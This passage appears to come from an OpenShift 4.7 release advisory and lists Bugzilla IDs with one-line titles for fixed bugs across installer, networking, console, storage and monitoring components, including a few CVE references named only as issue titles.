win10 home\n1883790 - revert \"force cert rotation every couple days for development\" in 4.7\n1883803 - node pull secret feature is not working as expected\n1883836 - Jenkins imagestream ubi8 and nodejs12 update\n1883847 - The UI does not show checkbox for enable encryption at rest for OCS\n1883853 - go list -m all does not work\n1883905 - race condition in opm index add --overwrite-latest\n1883946 - Understand why trident CSI pods are getting deleted by OCP\n1884035 - Pods are illegally transitioning back to pending\n1884041 - e2e should provide error info when minimum number of pods aren\u0027t ready in kube-system namespace\n1884131 - oauth-proxy repository should run tests\n1884165 - Repos should be disabled in -firstboot.service before OS extensions are applied\n1884221 - IO becomes unhealthy due to a file change\n1884258 - Node network alerts should work on ratio rather than absolute values\n1884270 - Git clone does not support SCP-style ssh locations\n1884334 - CVO marks an upgrade as failed when an operator takes more than 20 minutes to rollout\n1884435 - vsphere - loopback is randomly not being added to resolver\n1884565 - oauth-proxy crashes on invalid usage\n1884584 - Kuryr controller continuously restarting due to unable to clean up Network Policy\n1884613 - Create Instance of Prometheus from operator returns blank page for non cluster-admin users\n1884628 - ovs-configuration service fails when the external network is configured on a tagged vlan on top of a bond device on a baremetal IPI deployment\n1884629 - Visusally impaired user using screen reader not able to select Admin/Developer console options in drop down menu. \n1884632 - Adding BYOK disk encryption through DES\n1884654 - Utilization of a VMI is not populated\n1884655 - KeyError on self._existing_vifs[port_id]\n1884664 - Operator install page shows \"installing...\" instead of going to install status page\n1884672 - Failed to inspect hardware. Reason: unable to start inspection: \u0027idrac\u0027\n1884691 - Installer blocks cloud-credential-operator manual mode on GCP and Azure\n1884724 - Quick Start: Serverless quickstart doesn\u0027t match Operator install steps\n1884739 - Node process segfaulted\n1884824 - Update baremetal-operator libraries to k8s 1.19\n1885002 - network kube-rbac-proxy scripts crashloop rather than non-crash looping\n1885138 - Wrong detection of pending state in VM details\n1885151 - [Cloud Team - Cluster API Provider Azure] Logging is broken due to mix of k8s.io/klog v1 and v2\n1885165 - NoRunningOvnMaster alert falsely triggered\n1885170 - Nil pointer when verifying images\n1885173 - [e2e][automation] Add test for next run configuration feature\n1885179 - oc image append fails on push (uploading a new layer)\n1885213 - Vertical Pod Autoscaler (VPA) not working with DeploymentConfig\n1885218 - [e2e][automation] Add virtctl to gating script\n1885223 - Sync with upstream (fix panicking cluster-capacity binary)\n1885235 - Prometheus: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885241 - kube-rbac-proxy: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885243 - prometheus-adapter: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885244 - prometheus-operator: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885246 - cluster-monitoring-operator: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885249 - openshift-state-metrics: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885308 - Supermicro nodes failed to boot via disk during installation when using IPMI and UEFI\n1885315 - unit tests fail on slow disks\n1885319 - Remove redundant use of group and kind of DataVolumeTemplate\n1885343 - Console doesn\u0027t load in iOS Safari when using self-signed certificates\n1885344 - 4.7 upgrade - dummy bug for 1880591\n1885358 - add p\u0026f configuration to protect openshift traffic\n1885365 - MCO does not respect the install section of systemd files when enabling\n1885376 - failed to initialize the cluster: Cluster operator marketplace is still updating\n1885398 - CSV with only Webhook conversion can\u0027t be installed\n1885403 - Some OLM events hide the underlying errors\n1885414 - Need to disable HTX when not using HTTP/2 in order to preserve HTTP header name case\n1885425 - opm index add cannot batch add multiple bundles that use skips\n1885543 - node tuning operator builds and installs an unsigned RPM\n1885644 - Panic output due to timeouts in openshift-apiserver\n1885676 - [OCP 4.7]UI should fallback to minimal deployment only after total CPU \u003c 30 || totalMemory \u003c 72 GiB for initial deployment\n1885702 - Cypress:  Fix \u0027aria-hidden-focus\u0027 accesibility violations\n1885706 - Cypress:  Fix \u0027link-name\u0027 accesibility violation\n1885761 - DNS fails to resolve in some pods\n1885856 - Missing registry v1 protocol usage metric on telemetry\n1885864 - Stalld service crashed under the worker node\n1885930 - [release 4.7] Collect ServiceAccount statistics\n1885940 - kuryr/demo image ping not working\n1886007 - upgrade test with service type load balancer will never work\n1886022 - Move range allocations to CRD\u0027s\n1886028 - [BM][IPI] Failed to delete node after scale down\n1886111 - UpdatingopenshiftStateMetricsFailed: DeploymentRollout of openshift-monitoring/openshift-state-metrics: got 1 unavailable replicas\n1886134 - Need to set GODEBUG=x509ignoreCN=0 in initrd\n1886154 - System roles are not present while trying to create new role binding through web console\n1886166 - 1885517 Clone - Not needed for 4.7 - upgrade from 4.5-\u003e4.6 causes broadcast storm\n1886168 - Remove Terminal Option for Windows Nodes\n1886200 - greenwave / CVP is failing on bundle validations, cannot stage push\n1886229 - Multipath support for RHCOS sysroot\n1886294 - Unable to schedule a pod due to Insufficient ephemeral-storage\n1886327 - Attempt to add a worker using bad roodDeviceHint: bmh and machine become Provisioned, no error in status\n1886353 - [e2e][automation] kubevirt-gating job fails for a missing virtctl URL\n1886397 - Move object-enum to console-shared\n1886423 - New Affinities don\u0027t contain ID until saving\n1886435 - Azure UPI uses deprecated command \u0027group deployment\u0027\n1886449 - p\u0026f: add configuration to protect oauth server traffic\n1886452 - layout options doesn\u0027t gets selected style on click i.e grey background\n1886462 - IO doesn\u0027t recognize namespaces - 2 resources with the same name in 2 namespaces -\u003e only 1 gets collected\n1886488 - move e2e test off of nfs image from docker.io/gmontero/nfs-server:latest\n1886524 - Change default terminal command for Windows Pods\n1886553 - i/o timeout experienced from build02 when targeting CI test cluster during test execution\n1886600 - panic: assignment to entry in nil map\n1886620 - Application behind service load balancer with PDB is not disrupted\n1886627 - Kube-apiserver pods restarting/reinitializing periodically\n1886635 - CVE-2020-8563 kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider\n1886636 - Panic in machine-config-operator\n1886749 - Removing network policy from namespace causes inability to access pods through loadbalancer. \n1886751 - Gather MachineConfigPools\n1886766 - PVC dropdown has \u0027Persistent Volume\u0027 Label\n1886834 - ovn-cert is mandatory in both master and node daemonsets\n1886848 - [OSP] machine instance-state annotation discrepancy with providerStatus.instanceState\n1886861 - ordered-values.yaml not honored if values.schema.json provided\n1886871 - Neutron ports created for hostNetworking pods\n1886890 - Overwrite jenkins-agent-base imagestream\n1886900 - Cluster-version operator fills logs with \"Manifest: ...\" spew\n1886922 - [sig-network] pods should successfully create sandboxes by getting pod\n1886973 - Local storage operator doesn\u0027t include correctly populate LocalVolumeDiscoveryResult in console\n1886977 - [v2v]Incorrect VM Provider type displayed in UI while importing VMs through VMIO\n1887010 - Imagepruner met error \"Job has reached the specified backoff limit\" which causes image registry degraded\n1887026 - FC volume attach fails with \u201cno fc disk found\u201d error on OCP 4.6 PowerVM cluster\n1887040 - [upgrade] ovs pod crash for rhel worker when upgarde from 4.5 to 4.6\n1887046 - Event for LSO need update to avoid confusion\n1887088 - cluster-node-tuning-operator refers to missing cluster-node-tuned image\n1887375 - User should be able to specify volumeMode when creating pvc from web-console\n1887380 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console\n1887392 - openshift-apiserver: delegated authn/z should have ttl \u003e metrics/healthz/readyz/openapi interval\n1887428 - oauth-apiserver service should be monitored by prometheus\n1887441 - ingress misconfiguration may break authentication but ingress operator keeps reporting \"degraded: False\"\n1887454 - [sig-storage] In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (ext4)] volumes should store data\n1887456 - It is impossible to attach the default NIC to a bridge with the latest version of OVN Kubernetes\n1887465 - Deleted project is still referenced\n1887472 - unable to edit application group for KSVC via gestures (shift+Drag)\n1887488 - OCP 4.6:  Topology Manager OpenShift E2E test fails:  gu workload attached to SRIOV networks should let resource-aligned PODs have working SRIOV network interface\n1887509 - Openshift-tests conformance TopologyManager tests run when Machine Config Operator is not installed on cluster\n1887525 - Failures to set master HardwareDetails cannot easily be debugged\n1887545 - 4.5 to 4.6 upgrade fails when external network is configured on a bond device: ovs-configuration service fails and node becomes unreachable\n1887585 - ovn-masters stuck in crashloop after scale test\n1887651 - [Internal Mode] Object gateway (RGW) in unknown state after OCP upgrade. \n1887737 - Test TestImageRegistryRemovedWithImages is failing on e2e-vsphere-operator\n1887740 - cannot install descheduler operator after uninstalling it\n1887745 - API server is throwing 5xx error code for 42.11% of requests for LIST events\n1887750 - `oc explain localvolumediscovery` returns empty description\n1887751 - `oc explain localvolumediscoveryresult` returns empty description\n1887778 - Add ContainerRuntimeConfig gatherer\n1887783 - PVC upload cannot continue after approve the certificate\n1887797 - [CNV][V2V] Default network type is bridge for interface bound to POD network in VMWare migration wizard\n1887799 - User workload monitoring prometheus-config-reloader OOM\n1887850 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install test is flaky\n1887863 - Installer panics on invalid flavor\n1887864 - Clean up dependencies to avoid invalid scan flagging\n1887934 - TestForwardedHeaderPolicyAppend, TestForwardedHeaderPolicyReplace, and TestForwardedHeaderPolicyIfNone consistently fail because of case-sensitive comparison\n1887936 - Kube-scheduler should be able to parse v1beta1 KubeSchedulerConfig\n1888015 - workaround kubelet graceful termination of static pods bug\n1888028 - prevent extra cycle in aggregated apiservers\n1888036 - Operator details shows old CRD versions\n1888041 - non-terminating pods are going from running to pending\n1888072 - Setting Supermicro node to PXE boot via Redfish doesn\u0027t take affect\n1888073 - Operator controller continuously busy looping\n1888118 - Memory requests not specified for image registry operator\n1888150 - Install Operand Form on OperatorHub is displaying unformatted text\n1888172 - PR 209 didn\u0027t update the sample archive, but machineset and pdbs are now namespaced\n1888227 - Failed to deploy some of container image on the recent OCP 4.6 nightly build\n1888292 - Fix CVE-2015-7501 affecting agent-maven-3.5\n1888311 - p\u0026f: make SAR traffic from oauth and openshift apiserver exempt\n1888363 - namespaces crash in dev\n1888378 - [IPI on Azure] errors destroying cluster when Azure resource group was never created\n1888381 - instance:node_network_receive_bytes_excluding_lo:rate1m value twice expected\n1888464 - installer missing permission definitions for TagResources and UntagResources when installing in existing VPC\n1888494 - imagepruner pod is error when image registry storage is not configured\n1888565 - [OSP] machine-config-daemon-firstboot.service failed with \"error reading osImageURL from rpm-ostree\"\n1888595 - cluster-policy-controller logs shows error which reads initial monitor sync has error\n1888601 - The poddisruptionbudgets is using the operator service account, instead of gather\n1888657 - oc doesn\u0027t know its name\n1888663 - sdn starts after kube-apiserver, delay readyz until oauth-apiserver is reachable\n1888671 - Document the Cloud Provider\u0027s ignore-volume-az setting\n1888738 - quay.io/openshift/origin-must-gather:latest is not a multi-arch, manifest-list image\n1888763 - at least one of these parameters (Vendor, DeviceID or PfNames) has to be defined in nicSelector in CR %s\", cr.GetName()\n1888827 - ovnkube-master may segfault when trying to add IPs to a nil address set\n1888861 - need to pass dual-stack service CIDRs to kube-apiserver in dual-stack cluster\n1888866 - AggregatedAPIDown permanently firing after removing APIService\n1888870 - JS error when using autocomplete in YAML editor\n1888874 - hover message are not shown for some properties\n1888900 - align plugins versions\n1888985 - Cypress:  Fix \u0027Ensures buttons have discernible text\u0027 accesibility violation\n1889213 - The error message of uploading failure is not clear enough\n1889267 - Increase the time out for creating template and upload image in the terraform\n1889348 - Project link should be removed from Application Details page, since it is inaccurate (Application Stages)\n1889374 - Kiali feature won\u0027t work on fresh 4.6 cluster\n1889388 - ListBundles returns incorrect replaces/skips when bundles have been added via semver-skippatch mode\n1889420 - OCP failed to add vsphere disk when pod moved to new node during cluster upgrade\n1889515 - Accessibility - The symbols e.g checkmark in the Node \u003e overview page has no text description, label, or other accessible information\n1889529 - [Init-CR annotation] Inline alert shows operand instance was needed still appearing after creating an Operand instance\n1889540 - [4.5 upgrade][alert]CloudCredentialOperatorDown\n1889577 - Resources are not shown on project workloads page\n1889620 - [Azure] - Machineset not scaling when publicIP:true in disconnected Azure enviroment\n1889630 - Scheduling disabled popovers are missing for Node status in Node Overview and Details pages\n1889692 - Selected Capacity is showing wrong size\n1889694 - usbguard fails to install as RHCOS extension due to missing libprotobuf.so.15\n1889698 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off\n1889710 - Prometheus metrics on disk take more space compared to OCP 4.5\n1889721 - opm index add semver-skippatch mode does not respect prerelease versions\n1889724 - When LocalVolumeDiscovery CR is created form the LSO page User doesn\u0027t see the Disk tab\n1889767 - [vsphere] Remove certificate from upi-installer image\n1889779 - error when destroying a vSphere installation that failed early\n1889787 - OCP is flooding the oVirt engine with auth errors\n1889838 - race in Operator update after fix from bz1888073\n1889852 - support new AWS regions ap-east-1, af-south-1, eu-south-1\n1889863 - Router prints incorrect log message for namespace label selector\n1889891 - Backport timecache LRU fix\n1889912 - Drains can cause high CPU usage\n1889921 - Reported Degraded=False Available=False pair does not make sense\n1889928 - [e2e][automation] Add more tests for golden os\n1889943 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName\n1890038 - Infrastructure status.platform not migrated to status.platformStatus causes warnings\n1890074 - MCO extension kernel-headers is invalid\n1890104 - with Serverless 1.10 version of trigger/subscription/channel/IMC is V1 as latest\n1890130 - multitenant mode consistently fails CI\n1890141 - move off docker.io images for build/image-eco/templates/jenkins e2e\n1890145 - The mismatched of font size for Status Ready and Health Check secondary text\n1890180 - FieldDependency x-descriptor doesn\u0027t support non-sibling fields\n1890182 - DaemonSet with existing owner garbage collected\n1890228 - AWS: destroy stuck on route53 hosted zone not found\n1890235 - e2e: update Protractor\u0027s checkErrors logging\n1890250 - workers may fail to join the cluster during an update from 4.5\n1890256 - Replacing a master node on a baremetal IPI deployment gets stuck when deleting the machine of the unhealthy member\n1890270 - External IP doesn\u0027t work if the IP address is not assigned to a node\n1890361 - s390x: Generate new ostree rpm with fix for rootfs immutability\n1890456 - [vsphere] mapi_instance_create_failed doesn\u0027t work on vsphere\n1890467 - unable to edit an application without a service\n1890472 - [Kuryr] Bulk port creation exception not completely formatted\n1890494 - Error assigning Egress IP on GCP\n1890530 - cluster-policy-controller doesn\u0027t gracefully terminate\n1890630 - [Kuryr] Available port count not correctly calculated for alerts\n1890671 - [SA] verify-image-signature using service account does not work\n1890677 - \u0027oc image info\u0027 claims \u0027does not exist\u0027 for application/vnd.oci.image.manifest.v1+json manifest\n1890808 - New etcd alerts need to be added to the monitoring stack\n1890951 - Mirror of multiarch images together with cluster logging case problems. It doesn\u0027t sync the \"overall\" sha it syncs only the sub arch sha. \n1890984 - Rename operator-webhook-config to sriov-operator-webhook-config\n1890995 - wew-app should provide more insight into why image deployment failed\n1891023 - ovn-kubernetes rbac proxy never starts waiting for an incorrect API call\n1891047 - Helm chart fails to install using developer console because of TLS certificate error\n1891068 - [sig-instrumentation] Prometheus when installed on the cluster shouldn\u0027t report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured [Early] failing due to TargetDown alert from kube-scheduler\n1891080 - [LSO] When Localvolumeset and SC is already created before OCS install Creation of LVD and LVS is skipped when user click created storage cluster from UI\n1891108 - p\u0026f: Increase the concurrency share of workload-low priority level\n1891143 - CVO deadlocked while shutting down, shortly after fresh cluster install (metrics goroutine)\n1891189 - [LSO] max device limit is accepting negative values. PVC is not getting created and no error is shown\n1891314 - Display incompatible helm charts for installation (kubeVersion of cluster doesn\u0027t meet requirements of chart)\n1891362 - Wrong metrics count for openshift_build_result_total\n1891368 - fync should be fsync for etcdHighFsyncDurations alert\u0027s annotations.message\n1891374 - fync should be fsync for etcdHighFsyncDurations critical alert\u0027s annotations.message\n1891376 - Extra text in Cluster Utilization charts\n1891419 - Wrong detail head on network policy detail page. \n1891459 - Snapshot tests should report stderr of failed commands\n1891498 - Other machine config pools do not show during update\n1891543 - OpenShift 4.6/OSP install fails when node flavor has less than 25GB, even with dedicated storage\n1891551 - Clusterautoscaler doesn\u0027t scale up as expected\n1891552 - Handle missing labels as empty. \n1891555 - The windows oc.exe binary does not have version metadata\n1891559 - kuryr-cni cannot start new thread\n1891614 - [mlx] testpmd fails inside OpenShift pod using DevX version 19.11\n1891625 - [Release 4.7] Mutable LoadBalancer Scope\n1891702 - installer get pending when additionalTrustBundle is added into  install-config.yaml\n1891716 - OVN cluster upgrade from 4.6.1 to 4.7 fails\n1891740 - OperatorStatusChanged is noisy\n1891758 - the authentication operator may spam DeploymentUpdated event endlessly\n1891759 - Dockerfile builds cannot change /etc/pki/ca-trust\n1891816 - [UPI] [OSP] control-plane.yml provisioning playbook fails on OSP 16.1\n1891825 - Error message not very informative in case of mode mismatch\n1891898 - The ClusterServiceVersion can define Webhooks that cannot be created. \n1891951 - UI should show warning while creating pools with compression on\n1891952 - [Release 4.7] Apps Domain Enhancement\n1891993 - 4.5 to 4.6 upgrade doesn\u0027t remove deployments created by marketplace\n1891995 - OperatorHub displaying old content\n1891999 - Storage efficiency card showing wrong compression ratio\n1892004 - OCP 4.6 opm on Ubuntu 18.04.4 - error /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28\u0027 not found (required by ./opm)\n1892167 - [SR-IOV] SriovNetworkNodePolicies apply ignoring the spec.nodeSelector. \n1892198 - TypeError in \u0027Performance Profile\u0027 tab displayed for \u0027Performance Addon Operator\u0027\n1892288 - assisted install workflow creates excessive control-plane disruption\n1892338 - HAProxyReloadFail alert only briefly fires in the event of a broken HAProxy config\n1892358 - [e2e][automation] update feature gate for kubevirt-gating job\n1892376 - Deleted netnamespace could not be re-created\n1892390 - TestOverwrite/OverwriteBundle/DefaultBehavior in operator-registry is flaky\n1892393 - TestListPackages is flaky\n1892448 - MCDPivotError alert/metric missing\n1892457 - NTO-shipped stalld needs to use FIFO for boosting. \n1892467 - linuxptp-daemon crash\n1892521 - [AWS] Startup bootstrap machine failed due to ignition file is missing in disconnected UPI env\n1892653 - User is unable to create KafkaSource with v1beta\n1892724 - VFS added to the list of devices of the nodeptpdevice CRD\n1892799 - Mounting additionalTrustBundle in the operator\n1893117 - Maintenance mode on vSphere blocks installation. \n1893351 - TLS secrets are not able to edit on console. \n1893362 - The ovs-xxxxx_openshift-sdn container does not terminate gracefully, slowing down reboots\n1893386 - false-positive ReadyIngressNodes_NoReadyIngressNodes: Auth operator makes risky \"worker\" assumption when guessing about ingress availability\n1893546 - Deploy using virtual media fails on node cleaning step\n1893601 - overview filesystem utilization of OCP is showing the wrong values\n1893645 - oc describe route SIGSEGV\n1893648 - Ironic image building process is not compatible with UEFI secure boot\n1893724 - OperatorHub generates incorrect RBAC\n1893739 - Force deletion doesn\u0027t work for snapshots if snapshotclass is already deleted\n1893776 - No useful metrics for image pull time available, making debugging issues there impossible\n1893798 - Lots of error messages starting with \"get namespace to enqueue Alertmanager instances failed\" in the logs of prometheus-operator\n1893832 - ErrorCount field is missing in baremetalhosts.metal3.io CRD\n1893889 - disabled dropdown items in the pf dropdown component are skipped over and unannounced by JAWS\n1893926 - Some \"Dynamic PV (block volmode)\" pattern storage e2e tests are wrongly skipped\n1893944 - Wrong product name for Multicloud Object Gateway\n1893953 - (release-4.7) Gather default StatefulSet configs\n1893956 - Installation always fails at \"failed to initialize the cluster: Cluster operator image-registry is still updating\"\n1893963 - [Testday] Workloads-\u003e Virtualization is not loading for Firefox browser\n1893972 - Should skip e2e test cases as early as possible\n1894013 - [v2v][Testday] VMware to CNV VM import]VMware URL: It is not clear that only the FQDN/IP address is required without \u0027https://\u0027\n1894020 - User with edit users cannot deploy images from their own namespace from the developer perspective\n1894025 - OCP 4.5 to 4.6 upgrade for \"aws-ebs-csi-driver-operator\" fails when \"defaultNodeSelector\" is set\n1894041 - [v2v][[Testday]VM import from VMware/RHV] VM import wizard: The target storage class name is not displayed if default storage class is used. \n1894065 - tag new packages to enable TLS support\n1894110 - Console shows wrong value for maxUnavailable and maxSurge when set to 0\n1894144 - CI runs of baremetal IPI are failing due to newer libvirt libraries\n1894146 - ironic-api used by metal3 is over provisioned and consumes a lot of RAM\n1894194 - KuryrPorts leftovers from 4.6 GA need to be deleted\n1894210 - Failed to encrypt OSDs on OCS4.6 installation (via UI)\n1894216 - Improve OpenShift Web Console availability\n1894275 - Fix CRO owners file to reflect node owner\n1894278 - \"database is locked\" error when adding bundle to index image\n1894330 - upgrade channels needs to be updated for 4.7\n1894342 - oauth-apiserver logs many \"[SHOULD NOT HAPPEN] failed to update managedFields for ... OAuthClient ... no corresponding type for oauth.openshift.io/v1, Kind=OAuthClient\"\n1894374 - Dont prevent the user from uploading a file with incorrect extension\n1894432 - [oVirt] sometimes installer timeout on tmp_import_vm\n1894477 - bash syntax error in nodeip-configuration.service\n1894503 - add automated test for Polarion CNV-5045\n1894519 - [OSP] External mode cluster creation disabled for Openstack and oVirt platform\n1894539 - [on-prem] Unable to deploy additional machinesets on separate subnets\n1894645 - Cinder volume provisioning crashes on nil cloud provider\n1894677 - image-pruner job is panicking: klog stack\n1894810 - Remove TechPreview Badge from Eventing in Serverless version 1.11.0\n1894860 - \u0027backend\u0027 CI job passing despite failing tests\n1894910 - Update the node to use the real-time kernel fails\n1894992 - All nightly jobs for e2e-metal-ipi failing due to ipa image missing tenacity package\n1895065 - Schema / Samples / Snippets Tabs are all selected at the same time\n1895099 - vsphere-upi and vsphere-upi-serial jobs time out waiting for bootstrap to complete in CI\n1895141 - panic in service-ca injector\n1895147 - Remove memory limits on openshift-dns\n1895169 - VM Template does not properly manage Mount Windows guest tools check box during VM creation\n1895268 - The bundleAPIs should NOT be empty\n1895309 - [OCP v47] The RHEL node scaleup fails due to \"No package matching \u0027cri-o-1.19.*\u0027 found available\" on OCP 4.7 cluster\n1895329 - The infra index filled with warnings \"WARNING: kubernetes.io/cinder built-in volume provider is now deprecated. The Cinder volume provider is deprecated and will be removed in a future release\"\n1895360 - Machine Config Daemon removes a file although its defined in the dropin\n1895367 - Missing image in metadata DB index.db in disconnected Operator Hub installation. OCP 4.6.1\n1895372 - Web console going blank after selecting any operator to install from OperatorHub\n1895385 - Revert KUBELET_LOG_LEVEL back to level 3\n1895423 - unable to edit an application with a custom builder image\n1895430 - unable to edit custom template application\n1895509 - Backup taken on one master cannot be restored on other masters\n1895537 - [sig-imageregistry][Feature:ImageExtract] Image extract should extract content from an image\n1895838 - oc explain description contains \u0027/\u0027\n1895908 - \"virtio\" option is not available when modifying a CD-ROM to disk type\n1895909 - e2e-metal-ipi-ovn-dualstack is failing\n1895919 - NTO fails to load kernel modules\n1895959 - configuring webhook token authentication should prevent cluster upgrades\n1895979 - Unable to get coreos-installer with --copy-network to work\n1896101 - [cnv][automation] Added negative tests for migration from VMWare and RHV\n1896160 - CI: Some cluster operators are not ready: marketplace (missing: Degraded)\n1896188 - [sig-cli] oc debug deployment configs from a build: local-busybox-1-build not completed\n1896218 - Occasional GCP install failures: Error setting IAM policy for project ...: googleapi: Error 400: Service account ... does not exist., badRequest\n1896229 - Current Rate of Bytes Received and Current Rate of Bytes Transmitted data can not be loaded\n1896244 - Found a panic in storage e2e test\n1896296 - Git links should avoid .git as part of the URL and should not link git:// urls in general\n1896302 - [e2e][automation] Fix 4.6 test failures\n1896365 - [Migration]The SDN migration cannot revert under some conditions\n1896384 - [ovirt IPI]: local coredns resolution not working\n1896446 - Git clone from private repository fails after upgrade OCP 4.5 to 4.6\n1896529 - Incorrect instructions in the Serverless operator and application quick starts\n1896645 - documentationBaseURL needs to be updated for 4.7\n1896697 - [Descheduler] policy.yaml param in cluster configmap is empty\n1896704 - Machine API components should honour cluster wide proxy settings\n1896732 - \"Attach to Virtual Machine OS\" button should not be visible on old clusters\n1896866 - File /etc/NetworkManager/system-connections/default_connection.nmconnection  is incompatible with SR-IOV operator\n1896898 - ovs-configuration.service fails when multiple IPv6 default routes are provided via RAs over the same interface and deployment bootstrap fails\n1896918 - start creating new-style Secrets for AWS\n1896923 - DNS pod /metrics exposed on anonymous http port\n1896977 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters\n1897003 - VNC console cannot be connected after visit it in new window\n1897008 - Cypress: reenable check for \u0027aria-hidden-focus\u0027 rule \u0026 checkA11y test for modals\n1897026 - [Migration] With updating optional network operator configuration, migration stucks on MCO\n1897039 - router pod keeps printing log: template \"msg\"=\"router reloaded\"  \"output\"=\"[WARNING] 316/065823 (15) : parsing [/var/lib/haproxy/conf/haproxy.config:52]: option \u0027http-use-htx\u0027 is deprecated and ignored\n1897050 - [IBM Power] LocalVolumeSet provisions boot partition as PV. \n1897073 - [OCP 4.5] wrong netid assigned to Openshift projects/namespaces\n1897138 - oVirt provider uses depricated cluster-api project\n1897142 - When scaling replicas to zero, Octavia loadbalancer pool members are not updated accordingly\n1897252 - Firing alerts are not showing up in console UI after cluster is up for some time\n1897354 - Operator installation showing success, but Provided APIs are missing\n1897361 - The MCO GCP-OP tests fail consistently on containerruntime tests with \"connection refused\"\n1897412 - [sriov]disableDrain did not be updated in CRD of manifest\n1897423 - Max unavailable and Max surge value are not shown on Deployment Config Details page\n1897516 - Baremetal IPI deployment with IPv6 control plane fails when the nodes obtain both SLAAC and DHCPv6 addresses as they set their hostname to \u0027localhost\u0027\n1897520 - After restarting nodes the image-registry co is in degraded true state. \n1897584 - Add casc plugins\n1897603 - Cinder volume attachment detection failure in Kubelet\n1897604 - Machine API deployment fails: Kube-Controller-Manager can\u0027t reach API: \"Unauthorized\"\n1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers\n1897641 - Baremetal IPI with IPv6 control plane: nodes respond with duplicate packets to ICMP6 echo requests\n1897676 - [CI] [Azure] [UPI] CI failing since 4.6 changes in ignition\n1897830 - [GSS] Unable to deploy OCS 4.5.2 on OCP 4.6.1, cannot `Create OCS Cluster Service`\n1897891 - [RFE][v2v][UI][CNV VM import] Providing error message or/and block migration when vddk-init-image is missing\n1897897 - ptp lose sync openshift 4.6\n1898036 - no network after reboot (IPI)\n1898045 - AWS EBS CSI Driver can not get updated cloud credential secret automatically\n1898097 - mDNS floods the baremetal network\n1898118 - Lack of logs on some image stream tests make hard to find root cause of a problem\n1898134 - Descheduler logs show absolute values instead of percentage when LowNodeUtilization strategy is applied\n1898159 - kcm operator shall pass --allocate-node-cidrs=false to kcm for ovn-kube and openshift-sdn cluster\n1898174 - [OVN] EgressIP does not guard against node IP assignment\n1898194 - GCP: can\u0027t install on custom machine types\n1898238 - Installer validations allow same floating IP for API and Ingress\n1898268 - [OVN]: `make check` broken on 4.6\n1898289 - E2E test: Use KUBEADM_PASSWORD_FILE by default\n1898320 - Incorrect Apostrophe  Translation of  \"it\u0027s\" in Scheduling Disabled Popover\n1898357 - Within the operatorhub details view, long unbroken text strings do not wrap cause breaking display. \n1898407 - [Deployment timing regression] Deployment takes longer with 4.7\n1898417 - GCP: the dns targets in Google Cloud DNS is not updated after recreating loadbalancer service\n1898487 - [oVirt] Node is not removed when VM has been removed from oVirt engine\n1898500 - Failure to upgrade operator when a Service is included in a Bundle\n1898517 - Ironic auto-discovery may result in rogue nodes registered in ironic\n1898532 - Display names defined in specDescriptors not respected\n1898580 - When adding more than one node selector to the sriovnetworknodepolicy, the cni and the device plugin pods are constantly rebooted\n1898613 - Whereabouts should exclude IPv6 ranges\n1898655 - [oVirt] Node deleted in oVirt should cause the Machine to go into a Failed phase\n1898679 - Operand creation form - Required \"type: object\" properties (Accordion component) are missing red asterisk\n1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability\n1898745 - installation failing with CVO reporting openshift-samples not rolled out, samples not setting versions in its ClusterOperator\n1898839 - Wrong YAML in operator metadata\n1898851 - Multiple Pods access the same volume on the same node e2e test cases are missed from aws ebs csi driver e2e test job\n1898873 - Remove TechPreview Badge from Monitoring\n1898954 - Backup script does not take /etc/kubernetes/static-pod-resources on a reliable way\n1899111 - [RFE] Update jenkins-maven-agen to maven36\n1899128 - VMI details screen -\u003e show the warning that it is preferable to have a VM only if the VM actually does not exist\n1899175 - bump the RHCOS boot images for 4.7\n1899198 - Use new packages for ipa ramdisks\n1899200 - In Installed Operators page I cannot search for an Operator by it\u0027s name\n1899220 - Support AWS IMDSv2\n1899350 - configure-ovs.sh doesn\u0027t configure bonding options\n1899433 - When Creating OCS from ocs wizard Step Discover Disks shows Error \"An error occurred Not Found\"\n1899459 - Failed to start monitoring pods once the operator removed from override list of CVO\n1899515 - Passthrough credentials are not immediately re-distributed on update\n1899575 - update discovery burst to reflect lots of CRDs on openshift clusters\n1899582 - update discovery burst to reflect lots of CRDs on openshift clusters\n1899588 - Operator objects are re-created after all other associated resources have been deleted\n1899600 - Increased etcd fsync latency as of OCP 4.6\n1899603 - workers-rhel7 CI jobs failing: Failed to remove rollback: error running rpm-ostree cleanup\n1899627 - Project dashboard Active status using small icon\n1899725 - Pods table does not wrap well with quick start sidebar open\n1899746 - [ovn] error while waiting on flows for pod: OVS sandbox port is no longer active (probably due to a subsequent CNI ADD)\n1899760 - etcd_request_duration_seconds_bucket metric has excessive cardinality\n1899835 - catalog-operator repeatedly crashes with \"runtime error: index out of range [0] with length 0\"\n1899839 - thanosRuler.resources.requests does not take effect in user-workload-monitoring-config confimap\n1899853 - additionalSecurityGroupIDs not working for master nodes\n1899922 - NP changes sometimes influence new pods. \n1899949 - [Platform] Remove restriction on disk type selection for LocalVolumeSet\n1900008 - Fix internationalized sentence fragments in ImageSearch.tsx\n1900010 - Fix internationalized sentence fragments in BuildImageSelector.tsx\n1900020 - Remove \u0026apos; from internationalized keys\n1900022 - Search Page - Top labels field is not applied to selected Pipeline resources\n1900030 - disruption_tests: [sig-imageregistry] Image registry remain available failing consistently\n1900126 - Creating a VM results in suggestion to create a default storage class when one already exists\n1900138 - [OCP on RHV] Remove insecure mode from the installer\n1900196 - stalld is not restarted after crash\n1900239 - Skip \"subPath should be able to unmount\" NFS test\n1900322 - metal3 pod\u0027s toleration for key: node-role.kubernetes.io/master currently matches on exact value matches but should match on Exists\n1900377 - [e2e][automation] create new css selector for active users\n1900496 - (release-4.7) Collect spec config for clusteroperator 